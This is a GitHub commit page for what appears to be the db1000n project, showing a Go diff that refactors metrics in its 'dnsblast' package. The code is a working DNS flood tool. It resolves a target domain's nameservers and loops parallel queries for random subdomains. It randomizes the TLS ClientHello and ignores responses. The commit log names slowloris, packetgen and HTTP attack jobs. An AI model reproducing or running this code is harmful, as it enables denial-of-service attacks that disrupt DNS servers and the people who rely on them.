Skip to content

Commit

Permalink
Implement the new metrics Reporter (#484)
Browse files Browse the repository at this point in the history
* Implement the new metrics Reporter

* Fix linter

* Fix linter

* Keep propagating new metric reporter to jobs

* Make wsl happy

* Drop unused package, lol

* Instrument dnsblast with the new metrics reporter

* Instrument http jobs with the new metrics reporter

* Instrument packetgen job with the new metrics reporter

* Instrument slowloris job with the new metrics reporter and clean it up a bit

* Drop the unreliable bytes received stat to avoid the additional resource consumption

* Flush slowloris metrics

* Document metrics.Stats via a constructor

* Drop no longer used metrics implementation

* Remove nil checks in metrics
  • Loading branch information
jdoe7865623 authored Apr 12, 2022
1 parent 90589c1 commit 2346177
Show file tree
Hide file tree
Showing 19 changed files with 626 additions and 824 deletions.
214 changes: 79 additions & 135 deletions src/core/dnsblast/dns-blast.go
Original file line number Diff line number Diff line change
Expand Up @@ -4,12 +4,13 @@ import (
"context"
"crypto/tls"
"fmt"
"math/rand"
"net"
"strconv"
"strings"
"sync"
"time"

"github.com/google/uuid"
"github.com/miekg/dns"
utls "github.com/refraction-networking/utls"
"go.uber.org/zap"
Expand All @@ -18,11 +19,7 @@ import (
"github.com/Arriven/db1000n/src/utils/metrics"
)

// Useful contants
const (
DefaultDNSPort = 53
DefaultDNSOverTLSPort = 853

UDPProtoName = "udp"
TCPProtoName = "tcp"
TCPTLSProtoName = "tcp-tls"
Expand All @@ -38,11 +35,8 @@ type Config struct {
ClientID string
}

// DNSBlaster is a main worker struct for the package
type DNSBlaster struct{}

// Start starts the job based on provided configuration
func Start(ctx context.Context, logger *zap.Logger, wg *sync.WaitGroup, config *Config) error {
func Start(ctx context.Context, config *Config, wg *sync.WaitGroup, a *metrics.Accumulator, logger *zap.Logger) error {
defer utils.PanicHandler(logger)

logger.Debug("igniting the blaster",
Expand All @@ -62,9 +56,7 @@ func Start(ctx context.Context, logger *zap.Logger, wg *sync.WaitGroup, config *

logger.Debug("nameservers resolved for the root domain", zap.String("rootDomain", config.RootDomain), zap.Strings("nameservers", nameservers))

blaster := NewDNSBlaster()

stressTestParameters := &StressTestParameters{
stressTestParameters := &stressTestParameters{
Delay: config.Delay,
Protocol: config.Protocol,
SeedDomains: config.SeedDomains,
Expand All @@ -76,186 +68,133 @@ func Start(ctx context.Context, logger *zap.Logger, wg *sync.WaitGroup, config *
wg.Add(1)
}

go func(nameserver string, parameters *StressTestParameters) {
go func(nameserver string, a *metrics.Accumulator) {
if wg != nil {
defer wg.Done()
}

defer utils.PanicHandler(logger)

if err := blaster.ExecuteStressTest(ctx, logger, nameserver, parameters, config.ClientID); err != nil {
metrics.IncDNSBlast(config.RootDomain, "", config.Protocol, metrics.StatusFail)
logger.Debug("stress test finished with error",
zap.String("nameserver", nameserver),
zap.String("proto", config.Protocol),
zap.Strings("seeds", config.SeedDomains),
zap.Duration("delay", config.Delay),
zap.Int("parallelQueries", config.ParallelQueries),
zap.Error(err))

return
}
}(nameserver, stressTestParameters)
executeStressTest(ctx, nameserver, stressTestParameters, a, logger)
}(nameserver, a.Clone(uuid.NewString())) // metrics.Accumulator is not safe for concurrent use, so let's make a new one
}

return nil
}

// NewDNSBlaster returns properly initialized blaster instance
func NewDNSBlaster() *DNSBlaster {
return &DNSBlaster{}
}

// StressTestParameters contains parameters for a single stress test
type StressTestParameters struct {
// stressTestParameters contains parameters for a single stress test
type stressTestParameters struct {
Delay time.Duration
ParallelQueries int
Protocol string
SeedDomains []string
}

// ExecuteStressTest executes a stress test based on parameters
func (rcv *DNSBlaster) ExecuteStressTest(ctx context.Context, logger *zap.Logger, nameserver string, parameters *StressTestParameters, clientID string) error {
// executeStressTest executes a stress test based on parameters
func executeStressTest(ctx context.Context, nameserver string, parameters *stressTestParameters, a *metrics.Accumulator, logger *zap.Logger) {
defer utils.PanicHandler(logger)

sharedDNSClient := newDefaultDNSClient(parameters.Protocol)

dhhGenerator, err := NewDistinctHeavyHitterGenerator(ctx, parameters.SeedDomains)
if err != nil {
metrics.IncDNSBlast(nameserver, "", parameters.Protocol, metrics.StatusFail)

return fmt.Errorf("failed to bootstrap the distinct heavy hitter generator: %w", err)
reusableQuery := &queryParameters{
hostAndPort: nameserver,
qName: "", // To be generated on each cycle
qType: dns.TypeA,
}

defer dhhGenerator.Cancel()

nextLoopTicker := time.NewTicker(parameters.Delay)
defer nextLoopTicker.Stop()

var (
keepAliveCounter = 0
reusableQuery = &QueryParameters{
HostAndPort: nameserver,
QName: "", // To be generated on each cycle
QType: dns.TypeA,
}
)

for reusableQuery.QName = range dhhGenerator.Next() {
const keepAliveReminder = 256
if keepAliveCounter++; keepAliveCounter > keepAliveReminder {
logger.Debug("still blasting to server", zap.String("server", reusableQuery.HostAndPort))

keepAliveCounter = 0
}
for {
reusableQuery.qName = randomSubdomain(parameters.SeedDomains)
stats := make(metrics.MultiStats, parameters.ParallelQueries)

var wg sync.WaitGroup

wg.Add(parameters.ParallelQueries)

for i := 0; i < parameters.ParallelQueries; i++ {
go func() {
go func(i int) {
defer wg.Done()
defer utils.PanicHandler(logger)
rcv.SimpleQueryWithNoResponse(logger, sharedDNSClient, reusableQuery, clientID)
wg.Done()
}()
stats[i] = query(sharedDNSClient, reusableQuery, logger)
}(i)
}

wg.Wait()
a.AddStats("dns://"+nameserver, stats.Sum()).Flush()

select {
case <-ctx.Done():
logger.Debug("DNS stress canceled", zap.String("server", reusableQuery.HostAndPort))
logger.Debug("DNS stress canceled", zap.String("server", reusableQuery.hostAndPort))

return nil
return
case <-nextLoopTicker.C:
}
}

return nil
}

// QueryParameters contains parameters of a single dns query
type QueryParameters struct {
HostAndPort string
QName string
QType uint16
}

// Response is a dns response struct
type Response struct {
WithErr bool
Err error
Latency time.Duration
}

// SimpleQuery performs a simple dns query based on parameters
func (rcv *DNSBlaster) SimpleQuery(sharedDNSClient *dns.Client, parameters *QueryParameters) *Response {
question := new(dns.Msg).
SetQuestion(dns.Fqdn(parameters.QName), parameters.QType)

co, err := sharedDNSClient.Dial(parameters.HostAndPort)
if err != nil {
return &Response{
WithErr: err != nil,
Err: err,
}
}
//nolint:gosec // Cryptographically secure random not required
func randomSubdomain(rootDomains []string) string {
const (
subdomainMinLength = 3
subdomainMaxLength = 64
randomizerDictionary = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
)

// Upgrade connection to use randomized ClientHello for TCP-TLS connections
if sharedDNSClient.Net == TCPTLSProtoName {
co.Conn = utls.UClient(co, &utls.Config{InsecureSkipVerify: true}, utls.HelloRandomized)
b := make([]rune, subdomainMinLength+rand.Intn(subdomainMaxLength-subdomainMinLength))
for i := range b {
b[i] = []rune(randomizerDictionary)[rand.Intn(len(randomizerDictionary))]
}

defer co.Close()

_, rtt, err := sharedDNSClient.ExchangeWithConn(question, co)
return string(b) + "." + rootDomains[rand.Intn(len(rootDomains))] + "."
}

return &Response{
WithErr: err != nil,
Err: err,
Latency: rtt,
}
// queryParameters contains parameters of a single DNS query
type queryParameters struct {
hostAndPort string
qName string
qType uint16
}

// SimpleQueryWithNoResponse is like SimpleQuery but with optimizations enabled by not needing a response
func (rcv *DNSBlaster) SimpleQueryWithNoResponse(logger *zap.Logger, sharedDNSClient *dns.Client, parameters *QueryParameters, clientID string) {
question := new(dns.Msg).SetQuestion(dns.Fqdn(parameters.QName), parameters.QType)
seedDomain := getSeedDomain(parameters.QName)
func query(client *dns.Client, parameters *queryParameters, logger *zap.Logger) metrics.Stats {
seedDomain := getSeedDomain(parameters.qName)

co, err := sharedDNSClient.Dial(parameters.HostAndPort)
conn, err := client.Dial(parameters.hostAndPort)
if err != nil {
logger.Debug("failed to dial remote host to do the DNS query", zap.String("host", parameters.HostAndPort), zap.Error(err))
metrics.IncDNSBlast(parameters.HostAndPort, seedDomain, sharedDNSClient.Net, metrics.StatusFail)
logger.Debug("failed to dial remote host to do the DNS query", zap.String("host", parameters.hostAndPort), zap.Error(err))
metrics.IncDNSBlast(parameters.hostAndPort, seedDomain, client.Net, metrics.StatusFail)

return
return metrics.NewStats(1, 0, 0, 0)
}

// Upgrade connection to use randomized ClientHello for TCP-TLS connections
if sharedDNSClient.Net == TCPTLSProtoName {
co.Conn = utls.UClient(co, &utls.Config{InsecureSkipVerify: true}, utls.HelloRandomized)
if client.Net == TCPTLSProtoName {
conn.Conn = utls.UClient(conn, &utls.Config{InsecureSkipVerify: true}, utls.HelloRandomized)
}

defer co.Close()
defer conn.Close()

_, _, err = sharedDNSClient.Exchange(question, parameters.HostAndPort)
if err != nil {
metrics.IncDNSBlast(parameters.HostAndPort, seedDomain, sharedDNSClient.Net, metrics.StatusFail)
question := new(dns.Msg).SetQuestion(dns.Fqdn(parameters.qName), parameters.qType)

if _, _, err = client.ExchangeWithConn(question, conn); err != nil {
metrics.IncDNSBlast(parameters.hostAndPort, seedDomain, client.Net, metrics.StatusFail)
logger.Debug("failed to complete the DNS query", zap.Error(err))

return
return metrics.NewStats(1, 1, 0, uint64(question.Len()))
}

metrics.IncDNSBlast(parameters.HostAndPort, seedDomain, sharedDNSClient.Net, metrics.StatusSuccess)
}
metrics.IncDNSBlast(parameters.hostAndPort, seedDomain, client.Net, metrics.StatusSuccess)

const (
dialTimeout = 1 * time.Second // Let's not wait long if the server cannot be dialled, we all know why
writeTimeout = 500 * time.Millisecond // Longer write timeout than read timeout just to make sure the query is uploaded
readTimeout = 300 * time.Millisecond // Not really interested in reading responses
)
return metrics.NewStats(1, 1, 1, uint64(question.Len()))
}

func newDefaultDNSClient(proto string) *dns.Client {
const (
dialTimeout = 1 * time.Second // Let's not wait long if the server cannot be dialled, we all know why
writeTimeout = 500 * time.Millisecond // Longer write timeout than read timeout just to make sure the query is uploaded
readTimeout = 300 * time.Millisecond // Not really interested in reading responses
)

c := &dns.Client{
Dialer: &net.Dialer{
Timeout: dialTimeout,
Expand All @@ -275,27 +214,32 @@ func newDefaultDNSClient(proto string) *dns.Client {
return c
}

func getNameservers(rootDomain string, protocol string) (res []string, err error) {
port := DefaultDNSPort
if protocol == TCPTLSProtoName {
port = DefaultDNSOverTLSPort
}

func getNameservers(rootDomain string, protocol string) ([]string, error) {
nameservers, err := net.LookupNS(rootDomain)
if err != nil {
return nil, err
}

const (
defaultDNSPort = "53"
defaultDNSOverTLSPort = "853"
)

port := defaultDNSPort
if protocol == TCPTLSProtoName {
port = defaultDNSOverTLSPort
}

res := make([]string, 0, len(nameservers))
for _, nameserver := range nameservers {
res = append(res, net.JoinHostPort(nameserver.Host, strconv.Itoa(port)))
res = append(res, net.JoinHostPort(nameserver.Host, port))
}

return res, nil
}

// getSeedDomain cut last subdomain part and root domain "." (dot). From <value>="test.example.com." returns "example.com"
func getSeedDomain(value string) string {
index := strings.Index(value, ".")
// -1 to remove "." (dot) at end
return value[index+1 : len(value)-1]
return value[strings.Index(value, ".")+1 : len(value)-1]
}
27 changes: 1 addition & 26 deletions src/core/dnsblast/dns-blast_test.go
Original file line number Diff line number Diff line change
Expand Up @@ -94,7 +94,7 @@ func TestBlast(t *testing.T) {
blastContext, cancel := context.WithTimeout(context.Background(), testcase.Duration)
defer cancel()

err := Start(blastContext, zap.NewExample(), nil, config)
err := Start(blastContext, config, nil, nil, zap.NewExample())
if err != nil {
tt.Errorf("failed to start the blaster: %s", err)

Expand All @@ -105,28 +105,3 @@ func TestBlast(t *testing.T) {
})
}
}

func TestGetSeedDomain(t *testing.T) {
t.Parallel()

const seedDomain = `example.com`

generator, err := NewDistinctHeavyHitterGenerator(context.Background(), []string{seedDomain})
if err != nil {
t.Fatal(err)
}

count := 10

for subdomain := range generator.Next() {
resultSeedDomain := getSeedDomain(subdomain)
if resultSeedDomain != seedDomain {
t.Fatalf("Want %q, got %q", seedDomain, resultSeedDomain)
}

count--
if count == 0 {
break
}
}
}
Loading

0 comments on commit 2346177

Please sign in to comment.